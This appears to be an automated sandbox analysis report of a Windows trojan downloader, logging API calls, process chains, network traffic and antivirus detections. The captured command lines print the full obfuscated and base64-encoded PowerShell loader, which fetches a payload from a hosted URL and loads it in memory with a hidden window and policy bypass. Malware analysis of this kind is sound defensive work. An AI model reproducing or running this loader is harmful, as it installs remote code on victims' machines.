stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}url'+' = {2}https://'+'ra'+'w.'+'githubus'+'ercon'+'t'+'ent.com/N'+'o'+'D'+'et'+'ectOn'+'/NoDe'+'tectO'+'n/ref'+'s'+'/'+'h'+'e'+'a'+'ds/main'+'/DetahNoth-V'+'.txt{2}'+'; {1}b'+'as'+'e'+'64'+'Conte'+'nt'+' = '+'(New-Object'+' Sy'+'stem.'+'Net.'+'WebClie'+'nt).Do'+'wn'+'loadStri'+'n'+'g({1}ur'+'l);'+' '+'{1'+'}bin'+'a'+'ryCont'+'ent'+' '+'='+' [Sy'+'st'+'em.C'+'on'+'v'+'e'+'rt]'+'::Fr'+'omBas'+'e64Stri'+'ng({'+'1}base64Cont'+'ent)'+';'+' {1'+'}assembl'+'y'+' = [Reflect'+'ion'+'.A'+'ssembl'+'y]'+':'+':'+'Load({1}binar'+'yConte'+'nt);'+' [dnl'+'i'+'b.I'+'O'+'.H'+'ome]'+'::VAI({0}txt.JNraT/sdaol'+'n'+'wod/2rat/f'+'asfs'+'afslsds'+'dlveun/'+'gr'+'o.te'+'kc'+'ubtib/'+'/:sptth{0}, {0}desativado{0'+'}, '+'{'+'0}d'+'es'+'ativado{0}, {0}desativad'+'o{0}, '+'{'+'0}asp'+'net_re'+'gsql{'+'0'+'}'+', '+'{0}'+'{0},{0}{0}'+')') -f[cHAr]34,[cHAr]36,[cHAr]39)| &( $PsHOMe[21]+$PshOme[34]+'x')"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9dXJsJysnID0gezJ9aHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXMnKydlcmNvbicrJ3QnKydlbnQuY29tL04nKydvJysnRCcrJ2V0JysnZWN0T24nKycvTm9EZScrJ3RlY3RPJysnbi9yZWYnKydzJysnLycrJ2gnKydlJysnYScrJ2RzL21haW4nKycvRGV0YWhOb3RoLVYnKycudHh0ezJ9JysnOyB7MX1iJysnYXMnKydlJysnNjQnKydDb250ZScrJ250JysnID0gJysnKE5ldy1PYmplY3QnKycgU3knKydzdGVtLicrJ05ldC4nKydXZWJDbGllJysnbnQpLkRvJysnd24nKydsb2FkU3RyaScrJ24nKydnKHsxfXVyJysnbCk7JysnICcrJ3sxJysnfWJpbicrJ2EnKydyeUNvbnQnKydlbnQnKycgJysnPScrJyBbU3knKydzdCcrJ2VtLkMnKydvbicrJ3YnKydlJysncnRdJysnOjpGcicrJ29tQmFzJysnZTY0U3RyaScrJ25nKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnOycrJyB7MScrJ31hc3NlbWJsJysneScrJyA9IFtSZWZsZWN0JysnaW9uJysnLkEnKydzc2VtYmwnKyd5XScrJzonKyc6JysnTG9hZCh7MX1iaW5hcicrJ3lDb250ZScrJ250KTsnKycgW2RubCcrJ2knKydiLkknKydPJysnLkgnKydvbWVdJysnOjpWQUkoezB9dHh0LkpOcmFUL3NkYW9sJysnbicrJ3dvZC8ycmF0L2YnKydhc2ZzJysnYWZzbHNkcycrJ2RsdmV1bi8nKydncicrJ28udGUnKydrYycrJ3VidGliLycrJy86c3B0dGh7MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sICcrJ3snKycwfWQnKydlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZCcrJ297MH0sICcrJ3snKycwfWFzcCcrJ25ldF9yZScrJ2dzcWx7JysnMCcrJ30nKycsICcrJ3swfScrJ3swfSx7MH17MH0nKycpJykgLWZbY0hBcl0zNCxbY0hBcl0zNixbY0hBcl0zOSl8ICYoICRQc0hPTWVbMjFdKyRQc2hPbWVbMzRdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
cmdline powershell -command $Codigo = 'KCgneycrJzF9dXJsJysnID0gezJ9aHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXMnKydlcmNvbicrJ3QnKydlbnQuY29tL04nKydvJysnRCcrJ2V0JysnZWN0T24nKycvTm9EZScrJ3RlY3RPJysnbi9yZWYnKydzJysnLycrJ2gnKydlJysnYScrJ2RzL21haW4nKycvRGV0YWhOb3RoLVYnKycudHh0ezJ9JysnOyB7MX1iJysnYXMnKydlJysnNjQnKydDb250ZScrJ250JysnID0gJysnKE5ldy1PYmplY3QnKycgU3knKydzdGVtLicrJ05ldC4nKydXZWJDbGllJysnbnQpLkRvJysnd24nKydsb2FkU3RyaScrJ24nKydnKHsxfXVyJysnbCk7JysnICcrJ3sxJysnfWJpbicrJ2EnKydyeUNvbnQnKydlbnQnKycgJysnPScrJyBbU3knKydzdCcrJ2VtLkMnKydvbicrJ3YnKydlJysncnRdJysnOjpGcicrJ29tQmFzJysnZTY0U3RyaScrJ25nKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnOycrJyB7MScrJ31hc3NlbWJsJysneScrJyA9IFtSZWZsZWN0JysnaW9uJysnLkEnKydzc2VtYmwnKyd5XScrJzonKyc6JysnTG9hZCh7MX1iaW5hcicrJ3lDb250ZScrJ250KTsnKycgW2RubCcrJ2knKydiLkknKydPJysnLkgnKydvbWVdJysnOjpWQUkoezB9dHh0LkpOcmFUL3NkYW9sJysnbicrJ3dvZC8ycmF0L2YnKydhc2ZzJysnYWZzbHNkcycrJ2RsdmV1bi8nKydncicrJ28udGUnKydrYycrJ3VidGliLycrJy86c3B0dGh7MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sICcrJ3snKycwfWQnKydlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZCcrJ297MH0sICcrJ3snKycwfWFzcCcrJ25ldF9yZScrJ2dzcWx7JysnMCcrJ30nKycsICcrJ3swfScrJ3swfSx7MH17MH0nKycpJykgLWZbY0hBcl0zNCxbY0hBcl0zNixbY0hBcl0zOSl8ICYoICRQc0hPTWVbMjFdKyRQc2hPbWVbMzRdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2620
thread_handle: 0x000002e8
process_identifier: 2616
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9dXJsJysnID0gezJ9aHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXMnKydlcmNvbicrJ3QnKydlbnQuY29tL04nKydvJysnRCcrJ2V0JysnZWN0T24nKycvTm9EZScrJ3RlY3RPJysnbi9yZWYnKydzJysnLycrJ2gnKydlJysnYScrJ2RzL21haW4nKycvRGV0YWhOb3RoLVYnKycudHh0ezJ9JysnOyB7MX1iJysnYXMnKydlJysnNjQnKydDb250ZScrJ250JysnID0gJysnKE5ldy1PYmplY3QnKycgU3knKydzdGVtLicrJ05ldC4nKydXZWJDbGllJysnbnQpLkRvJysnd24nKydsb2FkU3RyaScrJ24nKydnKHsxfXVyJysnbCk7JysnICcrJ3sxJysnfWJpbicrJ2EnKydyeUNvbnQnKydlbnQnKycgJysnPScrJyBbU3knKydzdCcrJ2VtLkMnKydvbicrJ3YnKydlJysncnRdJysnOjpGcicrJ29tQmFzJysnZTY0U3RyaScrJ25nKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnOycrJyB7MScrJ31hc3NlbWJsJysneScrJyA9IFtSZWZsZWN0JysnaW9uJysnLkEnKydzc2VtYmwnKyd5XScrJzonKyc6JysnTG9hZCh7MX1iaW5hcicrJ3lDb250ZScrJ250KTsnKycgW2RubCcrJ2knKydiLkknKydPJysnLkgnKydvbWVdJysnOjpWQUkoezB9dHh0LkpOcmFUL3NkYW9sJysnbicrJ3dvZC8ycmF0L2YnKydhc2ZzJysnYWZzbHNkcycrJ2RsdmV1bi8nKydncicrJ28udGUnKydrYycrJ3VidGliLycrJy86c3B0dGh7MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sICcrJ3snKycwfWQnKydlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZCcrJ297MH0sICcrJ3snKycwfWFzcCcrJ25ldF9yZScrJ2dzcWx7JysnMCcrJ30nKycsICcrJ3swfScrJ3swfSx7MH17MH0nKycpJykgLWZbY0hBcl0zNCxbY0hBcl0zNixbY0hBcl0zOSl8ICYoICRQc0hPTWVbMjFdKyRQc2hPbWVbMzRdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002f0
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command $Codigo = 'KCgneycrJzF9dXJsJysnID0gezJ9aHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXMnKydlcmNvbicrJ3QnKydlbnQuY29tL04nKydvJysnRCcrJ2V0JysnZWN0T24nKycvTm9EZScrJ3RlY3RPJysnbi9yZWYnKydzJysnLycrJ2gnKydlJysnYScrJ2RzL21haW4nKycvRGV0YWhOb3RoLVYnKycudHh0ezJ9JysnOyB7MX1iJysnYXMnKydlJysnNjQnKydDb250ZScrJ250JysnID0gJysnKE5ldy1PYmplY3QnKycgU3knKydzdGVtLicrJ05ldC4nKydXZWJDbGllJysnbnQpLkRvJysnd24nKydsb2FkU3RyaScrJ24nKydnKHsxfXVyJysnbCk7JysnICcrJ3sxJysnfWJpbicrJ2EnKydyeUNvbnQnKydlbnQnKycgJysnPScrJyBbU3knKydzdCcrJ2VtLkMnKydvbicrJ3YnKydlJysncnRdJysnOjpGcicrJ29tQmFzJysnZTY0U3RyaScrJ25nKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnOycrJyB7MScrJ31hc3NlbWJsJysneScrJyA9IFtSZWZsZWN0JysnaW9uJysnLkEnKydzc2VtYmwnKyd5XScrJzonKyc6JysnTG9hZCh7MX1iaW5hcicrJ3lDb250ZScrJ250KTsnKycgW2RubCcrJ2knKydiLkknKydPJysnLkgnKydvbWVdJysnOjpWQUkoezB9dHh0LkpOcmFUL3NkYW9sJysnbicrJ3dvZC8ycmF0L2YnKydhc2ZzJysnYWZzbHNkcycrJ2RsdmV1bi8nKydncicrJ28udGUnKydrYycrJ3VidGliLycrJy86c3B0dGh7MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sICcrJ3snKycwfWQnKydlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZCcrJ297MH0sICcrJ3snKycwfWFzcCcrJ25ldF9yZScrJ2dzcWx7JysnMCcrJ30nKycsICcrJ3swfScrJ3swfSx7MH17MH0nKycpJykgLWZbY0hBcl0zNCxbY0hBcl0zNixbY0hBcl0zOSl8ICYoICRQc0hPTWVbMjFdKyRQc2hPbWVbMzRdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2764
thread_handle: 0x00000448
process_identifier: 2760
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}url'+' = {2}https://'+'ra'+'w.'+'githubus'+'ercon'+'t'+'ent.com/N'+'o'+'D'+'et'+'ectOn'+'/NoDe'+'tectO'+'n/ref'+'s'+'/'+'h'+'e'+'a'+'ds/main'+'/DetahNoth-V'+'.txt{2}'+'; {1}b'+'as'+'e'+'64'+'Conte'+'nt'+' = '+'(New-Object'+' Sy'+'stem.'+'Net.'+'WebClie'+'nt).Do'+'wn'+'loadStri'+'n'+'g({1}ur'+'l);'+' '+'{1'+'}bin'+'a'+'ryCont'+'ent'+' '+'='+' [Sy'+'st'+'em.C'+'on'+'v'+'e'+'rt]'+'::Fr'+'omBas'+'e64Stri'+'ng({'+'1}base64Cont'+'ent)'+';'+' {1'+'}assembl'+'y'+' = [Reflect'+'ion'+'.A'+'ssembl'+'y]'+':'+':'+'Load({1}binar'+'yConte'+'nt);'+' [dnl'+'i'+'b.I'+'O'+'.H'+'ome]'+'::VAI({0}txt.JNraT/sdaol'+'n'+'wod/2rat/f'+'asfs'+'afslsds'+'dlveun/'+'gr'+'o.te'+'kc'+'ubtib/'+'/:sptth{0}, {0}desativado{0'+'}, '+'{'+'0}d'+'es'+'ativado{0}, {0}desativad'+'o{0}, '+'{'+'0}asp'+'net_re'+'gsql{'+'0'+'}'+', '+'{0}'+'{0},{0}{0}'+')') -f[cHAr]34,[cHAr]36,[cHAr]39)| &( $PsHOMe[21]+$PshOme[34]+'x')"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000044c
1 1 0
Symantec CL.Downloader!gen11
Kaspersky HEUR:Trojan.Script.Generic
Ikarus Trojan-Downloader.VBS.Agent
Google Detected
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received 
Data received F
Data sent |xg…!VzÏU¢%,§še#†QlÖGGÌwPG.P€¼/5 ÀÀÀ À 287ÿraw.githubusercontent.com  
Data sent |xg…!üûíA êÍ;7Àç•VÖÞ&_²¤%ŒÕx5¸H/5 ÀÀÀ À 287ÿraw.githubusercontent.com  
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

send

buffer: |xg…!VzÏU¢%,§še#†QlÖGGÌwPG.P€¼/5 ÀÀÀ À 287ÿraw.githubusercontent.com  
socket: 1440
sent: 129
1 129 0

send

buffer: |xg…!üûíA êÍ;7Àç•VÖÞ&_²¤%ŒÕx5¸H/5 ÀÀÀ À 287ÿraw.githubusercontent.com  
socket: 1440
sent: 129
1 129 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}url'+' = {2}https://'+'ra'+'w.'+'githubus'+'ercon'+'t'+'ent.com/N'+'o'+'D'+'et'+'ectOn'+'/NoDe'+'tectO'+'n/ref'+'s'+'/'+'h'+'e'+'a'+'ds/main'+'/DetahNoth-V'+'.txt{2}'+'; {1}b'+'as'+'e'+'64'+'Conte'+'nt'+' = '+'(New-Object'+' Sy'+'stem.'+'Net.'+'WebClie'+'nt).Do'+'wn'+'loadStri'+'n'+'g({1}ur'+'l);'+' '+'{1'+'}bin'+'a'+'ryCont'+'ent'+' '+'='+' [Sy'+'st'+'em.C'+'on'+'v'+'e'+'rt]'+'::Fr'+'omBas'+'e64Stri'+'ng({'+'1}base64Cont'+'ent)'+';'+' {1'+'}assembl'+'y'+' = [Reflect'+'ion'+'.A'+'ssembl'+'y]'+':'+':'+'Load({1}binar'+'yConte'+'nt);'+' [dnl'+'i'+'b.I'+'O'+'.H'+'ome]'+'::VAI({0}txt.JNraT/sdaol'+'n'+'wod/2rat/f'+'asfs'+'afslsds'+'dlveun/'+'gr'+'o.te'+'kc'+'ubtib/'+'/:sptth{0}, {0}desativado{0'+'}, '+'{'+'0}d'+'es'+'ativado{0}, {0}desativad'+'o{0}, '+'{'+'0}asp'+'net_re'+'gsql{'+'0'+'}'+', '+'{0}'+'{0},{0}{0}'+')') -f[cHAr]34,[cHAr]36,[cHAr]39)| &( $PsHOMe[21]+$PshOme[34]+'x')"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9dXJsJysnID0gezJ9aHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXMnKydlcmNvbicrJ3QnKydlbnQuY29tL04nKydvJysnRCcrJ2V0JysnZWN0T24nKycvTm9EZScrJ3RlY3RPJysnbi9yZWYnKydzJysnLycrJ2gnKydlJysnYScrJ2RzL21haW4nKycvRGV0YWhOb3RoLVYnKycudHh0ezJ9JysnOyB7MX1iJysnYXMnKydlJysnNjQnKydDb250ZScrJ250JysnID0gJysnKE5ldy1PYmplY3QnKycgU3knKydzdGVtLicrJ05ldC4nKydXZWJDbGllJysnbnQpLkRvJysnd24nKydsb2FkU3RyaScrJ24nKydnKHsxfXVyJysnbCk7JysnICcrJ3sxJysnfWJpbicrJ2EnKydyeUNvbnQnKydlbnQnKycgJysnPScrJyBbU3knKydzdCcrJ2VtLkMnKydvbicrJ3YnKydlJysncnRdJysnOjpGcicrJ29tQmFzJysnZTY0U3RyaScrJ25nKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnOycrJyB7MScrJ31hc3NlbWJsJysneScrJyA9IFtSZWZsZWN0JysnaW9uJysnLkEnKydzc2VtYmwnKyd5XScrJzonKyc6JysnTG9hZCh7MX1iaW5hcicrJ3lDb250ZScrJ250KTsnKycgW2RubCcrJ2knKydiLkknKydPJysnLkgnKydvbWVdJysnOjpWQUkoezB9dHh0LkpOcmFUL3NkYW9sJysnbicrJ3dvZC8ycmF0L2YnKydhc2ZzJysnYWZzbHNkcycrJ2RsdmV1bi8nKydncicrJ28udGUnKydrYycrJ3VidGliLycrJy86c3B0dGh7MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sICcrJ3snKycwfWQnKydlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZCcrJ297MH0sICcrJ3snKycwfWFzcCcrJ25ldF9yZScrJ2dzcWx7JysnMCcrJ30nKycsICcrJ3swfScrJ3swfSx7MH17MH0nKycpJykgLWZbY0hBcl0zNCxbY0hBcl0zNixbY0hBcl0zOSl8ICYoICRQc0hPTWVbMjFdKyRQc2hPbWVbMzRdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
parent_process wscript.exe martian_process powershell -command $Codigo = 'KCgneycrJzF9dXJsJysnID0gezJ9aHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXMnKydlcmNvbicrJ3QnKydlbnQuY29tL04nKydvJysnRCcrJ2V0JysnZWN0T24nKycvTm9EZScrJ3RlY3RPJysnbi9yZWYnKydzJysnLycrJ2gnKydlJysnYScrJ2RzL21haW4nKycvRGV0YWhOb3RoLVYnKycudHh0ezJ9JysnOyB7MX1iJysnYXMnKydlJysnNjQnKydDb250ZScrJ250JysnID0gJysnKE5ldy1PYmplY3QnKycgU3knKydzdGVtLicrJ05ldC4nKydXZWJDbGllJysnbnQpLkRvJysnd24nKydsb2FkU3RyaScrJ24nKydnKHsxfXVyJysnbCk7JysnICcrJ3sxJysnfWJpbicrJ2EnKydyeUNvbnQnKydlbnQnKycgJysnPScrJyBbU3knKydzdCcrJ2VtLkMnKydvbicrJ3YnKydlJysncnRdJysnOjpGcicrJ29tQmFzJysnZTY0U3RyaScrJ25nKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnOycrJyB7MScrJ31hc3NlbWJsJysneScrJyA9IFtSZWZsZWN0JysnaW9uJysnLkEnKydzc2VtYmwnKyd5XScrJzonKyc6JysnTG9hZCh7MX1iaW5hcicrJ3lDb250ZScrJ250KTsnKycgW2RubCcrJ2knKydiLkknKydPJysnLkgnKydvbWVdJysnOjpWQUkoezB9dHh0LkpOcmFUL3NkYW9sJysnbicrJ3dvZC8ycmF0L2YnKydhc2ZzJysnYWZzbHNkcycrJ2RsdmV1bi8nKydncicrJ28udGUnKydrYycrJ3VidGliLycrJy86c3B0dGh7MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sICcrJ3snKycwfWQnKydlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZCcrJ297MH0sICcrJ3snKycwfWFzcCcrJ25ldF9yZScrJ2dzcWx7JysnMCcrJ30nKycsICcrJ3swfScrJ3swfSx7MH17MH0nKycpJykgLWZbY0hBcl0zNCxbY0hBcl0zNixbY0hBcl0zOSl8ICYoICRQc0hPTWVbMjFdKyRQc2hPbWVbMzRdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe